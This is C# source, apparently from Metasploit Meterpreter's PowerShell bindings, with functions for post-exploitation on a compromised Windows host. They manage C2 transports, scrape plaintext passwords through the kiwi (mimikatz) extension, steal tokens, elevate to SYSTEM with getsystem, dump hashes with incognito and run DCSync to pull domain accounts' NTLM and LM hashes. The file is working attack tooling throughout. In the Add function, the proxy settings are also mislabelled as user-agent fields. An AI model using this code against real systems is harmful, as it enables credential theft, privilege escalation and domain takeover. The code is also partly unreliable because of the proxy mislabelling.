public static SessionDefinition List()
{
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("core_transport_list"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] List result returned");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
System.Diagnostics.Debug.Write("[PSH BINDING] List succeeded");
var expirySeconds = Tlv.GetValue <int>(responseTlv, TlvType.TransSessExp);
var session = new SessionDefinition(DateTime.Now.AddSeconds(expirySeconds));
foreach (var transportObj in responseTlv[TlvType.TransGroup])
{
var transportDict = (Dictionary <TlvType, List <object> >)transportObj;
var transport = new TransportInstance
{
Url = Tlv.GetValue <string>(transportDict, TlvType.TransUrl, string.Empty),
CommTimeout = Tlv.GetValue <int>(transportDict, TlvType.TransCommTimeout),
RetryTotal = Tlv.GetValue <int>(transportDict, TlvType.TransRetryTotal),
RetryWait = Tlv.GetValue <int>(transportDict, TlvType.TransRetryWait),
UserAgent = Tlv.GetValue <string>(transportDict, TlvType.TransUa, string.Empty),
ProxyHost = Tlv.GetValue <string>(transportDict, TlvType.TransProxyHost, string.Empty),
ProxyUser = Tlv.GetValue <string>(transportDict, TlvType.TransProxyUser, string.Empty),
ProxyPass = Tlv.GetValue <string>(transportDict, TlvType.TransProxyPass, string.Empty),
};
var hash = Tlv.GetValue <byte[]>(transportDict, TlvType.TransCertHash);
if (hash != null && hash.Length > 0)
{
transport.CertHash = BitConverter.ToString(hash).Replace("-", "");
}
session.Transports.Add(transport);
}
return(session);
}
System.Diagnostics.Debug.Write("[PSH BINDING] List failed");
}
else
{
System.Diagnostics.Debug.Write("[PSH BINDING] List result was null");
}
return(null);
}
public static List <Credential> CredsAll()
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call CredsAll");
if (!User.IsSystem())
{
throw new InvalidOperationException("Current session is not running as SYSTEM");
}
Tlv tlv = new Tlv();
tlv.Pack(TlvType.KiwiPwdId, 0);
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("kiwi_scrape_passwords"));
var ids = new Dictionary <string, Credential>();
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, kiwi is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
foreach (var credObj in responseTlv[TlvType.KiwiPwdResult])
{
var credDict = (Dictionary <TlvType, List <object> >)credObj;
var credential = new Credential
{
Domain = Tlv.GetValue <string>(credDict, TlvType.KiwiPwdDomain, string.Empty),
Username = Tlv.GetValue <string>(credDict, TlvType.KiwiPwdUserName, string.Empty),
Password = Tlv.GetValue <string>(credDict, TlvType.KiwiPwdPassword, string.Empty)
};
if (!ids.ContainsKey(credential.ToString()))
{
ids.Add(credential.ToString(), credential);
}
}
return(new List <Credential>(ids.Values));
}
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, kiwi is probably not loaded");
throw new InvalidOperationException("Kiwi extension is not loaded");
}
public static bool Rev2Self()
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call Rev2Self");
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigRev2self));
if (result != null)
{
var responseTlv = Tlv.FromResponse(result);
return(responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0);
}
return(false);
}
public static bool DropToken()
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call DropToken");
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_drop_token"));
if (result != null)
{
var responseTlv = Tlv.FromResponse(result);
return(responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0);
}
return(false);
}
public static bool StealToken(int pid)
{
System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] Invoking binding call StealToken({0})", pid));
Tlv tlv = new Tlv();
tlv.Pack(TlvType.Pid, pid);
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_steal_token"));
if (result != null)
{
var responseTlv = Tlv.FromResponse(result);
return(responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0);
}
return(false);
}
public static List <ProcessInfo> ProcessList()
{
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_process_get_processes"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList result returned");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList succeeded");
var processes = new List <ProcessInfo>();
foreach (var processObj in responseTlv[TlvType.ProcessGroup])
{
var processDict = (Dictionary <TlvType, List <object> >)processObj;
var process = new ProcessInfo
{
Architecture = Tlv.GetValue <int>(processDict, TlvType.ProcessArch) == 1 ? "x86" : "x86_64",
Name = Tlv.GetValue <string>(processDict, TlvType.ProcessName, string.Empty),
Username = Tlv.GetValue <string>(processDict, TlvType.UserName, string.Empty),
Pid = Tlv.GetValue <int>(processDict, TlvType.Pid),
ParentPid = Tlv.GetValue <int>(processDict, TlvType.ParentPid),
Path = Tlv.GetValue <string>(processDict, TlvType.ProcessPath, string.Empty),
Session = Tlv.GetValue <int>(processDict, TlvType.ProcessSession)
};
processes.Add(process);
}
return(processes);
}
System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList failed");
}
else
{
System.Diagnostics.Debug.Write("[PSH BINDING] ProcessList result was null");
}
return(null);
}
public static List <Mount> ShowMount()
{
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_fs_mount_show"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount result returned");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount succeeded");
var mounts = new List <Mount>();
foreach (var mountObj in responseTlv[TlvType.Mount])
{
var mountDict = (Dictionary <TlvType, List <object> >)mountObj;
var mount = new Mount
{
Name = Tlv.GetValue <string>(mountDict, TlvType.MountName, string.Empty),
Type = Tlv.GetValue <MountType>(mountDict, TlvType.MountType, MountType.Unknown),
SpaceUser = Tlv.GetValue <Int64>(mountDict, TlvType.MountSpaceUser),
SpaceTotal = Tlv.GetValue <Int64>(mountDict, TlvType.MountSpaceTotal),
SpaceFree = Tlv.GetValue <Int64>(mountDict, TlvType.MountSpaceFree),
UncPath = Tlv.GetValue <string>(mountDict, TlvType.MountUncPath, string.Empty)
};
mounts.Add(mount);
}
return(mounts);
}
System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount failed");
}
else
{
System.Diagnostics.Debug.Write("[PSH BINDING] ShowMount result was null");
}
return(null);
}
public static bool GetSystem()
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call GetSystem");
Tlv tlv = new Tlv();
tlv.Pack(TlvType.ElevateTechnique, 1);
tlv.Pack(TlvType.ElevateServiceName, "abcd1234");
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("priv_elevate_getsystem"));
if (result != null)
{
var responseTlv = Tlv.FromResponse(result);
return(responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0);
}
return(false);
}
public static bool SnarfHashes()
{
System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call SnarfHashes");
Tlv tlv = new Tlv();
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_snarf_hashes"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, incognito is probably loaded");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
return(true);
}
return(false);
}
System.Diagnostics.Debug.Write("[PSH BINDING] Result not returned, incognito is probably not loaded");
throw new InvalidOperationException("incognito extension is not loaded");
}
public static bool Add(TransportInstance transport, int sessionExpiry = 0)
{
Tlv tlv = new Tlv();
tlv.Pack(TlvType.TransUrl, transport.Url);
if (sessionExpiry > 0)
{
tlv.Pack(TlvType.TransSessExp, sessionExpiry);
}
if (transport.CommTimeout > 0)
{
tlv.Pack(TlvType.TransCommTimeout, transport.CommTimeout);
}
if (transport.RetryTotal > 0)
{
tlv.Pack(TlvType.TransRetryTotal, transport.RetryTotal);
}
if (transport.RetryWait > 0)
{
tlv.Pack(TlvType.TransRetryWait, transport.RetryWait);
}
if (!string.IsNullOrEmpty(transport.UserAgent))
{
tlv.Pack(TlvType.TransUa, transport.UserAgent);
}
if (!string.IsNullOrEmpty(transport.ProxyHost))
{
tlv.Pack(TlvType.TransUa, transport.ProxyHost);
}
if (!string.IsNullOrEmpty(transport.ProxyUser))
{
tlv.Pack(TlvType.TransUa, transport.ProxyUser);
}
if (!string.IsNullOrEmpty(transport.ProxyPass))
{
tlv.Pack(TlvType.TransUa, transport.ProxyPass);
}
if (!string.IsNullOrEmpty(transport.CertHash))
{
var hash = new byte[transport.CertHash.Length / 2];
for (var i = 0; i < hash.Length; ++i)
{
hash[i] = Convert.ToByte(transport.CertHash.Substring(i * 2, 2), 16);
}
tlv.Pack(TlvType.TransCertHash, hash);
}
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("core_transport_add"));
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] List result returned");
var responseTlv = Tlv.FromResponse(result);
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0)
{
return(true);
}
}
return(false);
}
public static SyncRecord DcSync(string username, string domainController = null, string domainFQDN = null)
{
if (User.IsSystem())
{
throw new InvalidOperationException("Current session is running as SYSTEM, dcsync won't work.");
}
System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] User is not running as SYSTEM.");
if (string.IsNullOrEmpty(username) || !username.Contains("\\"))
{
throw new ArgumentException("Username must be specified in the format 'DOMAIN\\username'.");
}
Tlv tlv = new Tlv();
var command = string.Format("lsadump::dcsync /user:{0}", username);
if (!string.IsNullOrEmpty(domainController))
{
command = string.Format("{0} /dc:{1}", command, domainController);
}
if (!string.IsNullOrEmpty(domainFQDN))
{
command = string.Format("{0} /domain:{1}", command, domainFQDN);
}
// Mustn't forget to wrap this in a string so it's considered a single command
command = string.Format("\"{0}\"", command);
System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Command execution will contain: " + command);
tlv.Pack(TlvType.KiwiCmd, command);
System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoking kiwi_exec_cmd");
var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("kiwi_exec_cmd"));
System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoked kiwi_exec_cmd");
if (result != null)
{
System.Diagnostics.Debug.Write("[PSH BINDING] Result returned, kiwi is probably loaded");
var responseTlv = Tlv.FromResponse(result);
System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] DcSync response came back with {0} results", responseTlv.Count));
System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] DcSync response should contain a value for {0} {1}", TlvType.KiwiCmdResult, (int)TlvType.KiwiCmdResult));
foreach (var k in responseTlv.Keys)
{
System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] DcSync response contains key: {0} ({1})", k, (int)k));
}
if (responseTlv[TlvType.Result].Count > 0 &&
(int)responseTlv[TlvType.Result][0] == 0 &&
responseTlv[TlvType.KiwiCmdResult].Count > 0 &&
responseTlv[TlvType.KiwiCmdResult][0].ToString().Length > 0)
{
System.Diagnostics.Debug.Write("[PSH BINDING] DcSync returned with some data");
var resultString = responseTlv[TlvType.KiwiCmdResult][0].ToString();
var record = new SyncRecord
{
Account = username
};
var elementsFound = 0;
foreach (var line in resultString.Split('\n'))
{
var stripped = line.Trim();
if (stripped.StartsWith("Hash NTLM: "))
{
var parts = stripped.Split(' ');
record.NtlmHash = parts[parts.Length - 1];
elementsFound++;
}
else if (stripped.StartsWith("lm - 0: "))
{
var parts = stripped.Split(' ');
record.LmHash = parts[parts.Length - 1];
elementsFound++;
}
else if (stripped.StartsWith("Object Security ID"))
{
var parts = stripped.Split(' ');
record.SID = parts[parts.Length - 1];
elementsFound++;
}
else if (stripped.StartsWith("Object Relative ID"))
{
var parts = stripped.Split(' ');
record.RID = parts[parts.Length - 1];
elementsFound++;
}
if (elementsFound > 3)
{
break;
}
}
return(record);
}
}
System.Diagnostics.Debug.Write("[PSH BINDING] No result returned, kiwi is probably not loaded");
throw new InvalidOperationException("Kiwi extension not loaded.");
}
